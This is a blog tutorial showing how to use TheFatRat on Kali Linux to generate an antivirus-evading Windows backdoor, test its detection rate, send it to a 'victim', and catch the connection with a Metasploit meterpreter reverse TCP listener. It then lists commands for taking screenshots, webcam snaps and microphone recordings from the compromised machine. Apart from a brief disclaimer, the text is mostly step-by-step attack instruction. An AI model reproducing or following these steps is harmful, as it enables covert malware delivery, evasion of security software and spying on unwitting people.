Advertise here

Thursday, November 29, 2018

Do you struggle to generate an Undetectable Payload?

Yeah. I know the feeling.

Well, when I was learning these things, I struggled every day to create an undetectable payload but I used to fail each time. At that time after some search, somehow I managed to bypass Antivirus protection.

But the Antiviruses were not so strong as they are now and that's why bypassing those is not easy these days. But nothing can stop a hacker for the lifetime. Many developers are working around the world to make some advanced clever scripts to manage these things.

Here, in this tutorial, I am going to demonstrate the best script called TheFatRat, we can use in this business.

Let's go ahead.

What is TheFatRat?

Generate Undetectable Payload for Windows Using Kali Linux

The FatRat is an open source project available on Github. The script is coded by Screetsec.

The best thing about FatRat is, it can generate backdoors and payloads for all popular platforms such as Windows, Mac, Linux, and Android. These backdoors and payloads can be used for browser attack, dll attack etc.

This tool compiles a malware with payloads and then the payloads can be executed in the platforms mentioned above. The special advantage of this tool is it can create powerful malware who has the ability to bypass most Antivirus software protection.

You can generate backdoors, payloads for all these platforms in one tool. Isn't it a good thing?

Features of TheFatRat:

1. It can create backdoors for Windows, Mac, Linux, Android.
2. Bypass Antivirus Software Protection.
3. Multiple meterpreter listeners can be started using it.
4. Also can create autorun script.
5. The generated backdoors can be bound with MS word, PDF, RAR file etc. 

Let's go ahead and see how it can be configured in Kali Linux.

Step 1: Install FatRat in Kali Linux:

First of all, fire up your Kali Linux machine and open up the terminal. Download/clone TheFatRat from here.

Change the directory to Desktop or wherever you want. Here I am using the following commands to clone the tool.

cd Desktop/
git clone https://github.com/Screetsec/TheFatRat.git

This command will clone the tool on the Desktop. The file is a little big around 200 MB so it will take some time to finish the download. The download speed depends upon your internet speed. Now, change the directory to the TheFatRat folder. In my case, I am using the command-

cd Desktop/
ls
cd TheFatRat/
ls


Generate Undetectable Payload for Windows Using Kali Linux

Now, you have to take root permission for the setup.sh script. Here the script is showing in green color(depends on the terminal text color) that means I already have the permission. If you don't have, run the command chmod +x setup.sh and it will grant root permission for the script.

In the next step, run the script by the command-

./setup.sh

The script will start and it will check the required packages if they are installed or not. If not it will install them automatically. After completing the checking, a question will appear asking whether you want to create a path for FatRat or not.


Generate Undetectable Payload for Windows Using Kali Linux

 If you are not sure about it click on 'No', or if you want to create a path so that you can open it from wherever you want then click on 'Yes'. I recommend you to click on 'Yes' so that you can open it from the terminal.

Now your setup is completed successfully.

In the next step, exit the terminal and open a new terminal and run FatRat by the command-

fatrat 

This command will start the tool. At starting the tool will check for the internet connection, the required packages are properly installed or not. After checking all, TheFatRat will launch the options menu to create backdoors.

Let's go ahead and see how can we generate an undetectable payload using TheFatRat.

Step 2: Generate an Undetectable(100% FUD) Payload Using The FatRat:

Well, Now its time generate a payload to execute on the victim's system. Open a new terminal and start the FatRat tool by the command 'fatrat'After loading the FatRat, you will see many options to create different backdoors for different platforms. Here I am selecting the second option which is-

[02] Create Fud 100% Backdoor with Fudwin 1.0


Generate Undetectable Payload for Windows Using Kali Linux

This option is to generate payload for a Windows machine. After selecting the option, new options will come up. Here I am using the latest version of Fatrat. I got here a new option called Powerstager 0.2.5.

Generate Undetectable Payload for Windows Using Kali Linux

I've tried the No.1 option but it failed to create a payload and showed an error while creating the payload. Maybe the tool is in developing mode right now. Don't worry, try the first option after some months. Now proceed the work with the No.2 option.

Old is Gold! I've selected the second option, which says Slow But powerful.

After entering the second option, the tool will show the local IPV4, IPV6 address, public IP address, and the hostname.


Generate Undetectable Payload for Windows Using Kali Linux

Here I will apply the payload on my another PC which is connected to my local Network. So I am using local IP here. If you want it to work over the WAN then take your public IP address. 
(N.B: If you want to take the public IP so that the payload can work over WAN, the IP must be static. If you have a dynamic public IP then you can deal with no-ip website. It will give you a hostname for free which you can use as a static IP instead of dynamic IP. Our tutorial on no-ip website is coming soon! Stay tuned till then.)

Now, set the local IP and set any local port number and hit enter.

In this screen, the tool will ask you to choose your Windows architecture to generate the payload according to it. Here, my Windows is 64bit and that's why I am selecting the 64bit FUD payload.


Generate Undetectable Payload for Windows Using Kali Linux

Now the tool will start generating the payload. It might show you several errors during the generating process but don't worry. Stay with patience until it finishes the process.


Generate Undetectable Payload for Windows Using Kali Linux


Here I've generated the payload successfully which is saved to the output folder of TheFatrat.

I've uploaded the generated payload on VirusTotal. Only 3 Antivirus software detected it virus out of 69 but it is not recommended to upload it on VirusTotal. Do upload and scan it on NoDistribute to make sure you have created an undetectable payload.

Now send the payload to the victim and set a listener so that you can control the system.

Let's go ahead and see how to set a listener.

Step 3: Set a listener against the payload(Meterpreter reverse TCP):

Well, we are at the end. Now it is time to do some hack with the payload. To do that we need to set a listener. Follow the guide. First of all, open up a new terminal and start the Metasploit with the command-

msfconsole

This command will load the Metasploit interface. Now type the command-

use exploit/multi/handler

This command will start the multi handler. In the next step, set the target payload with the command-

set payload windows/meterpreter/reverse tcp

Now its time to set the local host and port. Run the commands-

set lhost 192.168.42.138
set lport 8080

Here, replace the local IP and the port with yours. The IP and the port are the same that we used to create the payload. You must do the same.

Now start the payload handler with the command-

exploit

Generate Undetectable Payload for Windows Using Kali Linux

This is the time to send the payload to the victim. If the victim clicks the payload, it will be connected with us and the payload handler will show the message.

Now its time to use the meterpreter. The common commands you can use here to operate the victim's system are given below. Here I am adding an extra screenshot to prove whether the meterpreter commands working or not.


Generate Undetectable Payload for Windows Using Kali Linux

Common meterpreter commands:

sysinfo- To Know about the system
screenshot- To get a screenshot
webcam_snap- To take a snapshot from a running webcam
record_mic- To record voice from a running mic
reboot- To reboot the system
shutdown- To shut down the system
suspend- To suspend the system

To know more commands, type '?' and hit enter. You will get all commands you can use against the victim to control his system.

Warning:

Do practice on your own property. Don't apply it to properties which are not owned by you. If you want to, then take a written permission from the owner of the property. We are not responsible for any kind of damage caused by you.

Conclusion:

It is a good thing that we can create payloads for free of cost. We should thank the creator of the script. But the bad thing is, it is an open source project and anybody can misuse it. Mainly the script bunnies.

Also, we can get some knowledge on payloads. How they work, how they can be created and we can protect us from payloads etc.

if you found the tutorial helpful then don't forget to let us know and also if you are facing any problem regarding the installation or use of this tool, feel free to comment us below.

Authored By: Manas Lahon

Comments 0

Thanks for visiting us. Please Do comment with a valid name. Don't comment as Unknown.
(Warning: Do not spam in the comment box. Repetitive comments will not be moderated.)
EmoticonEmoticon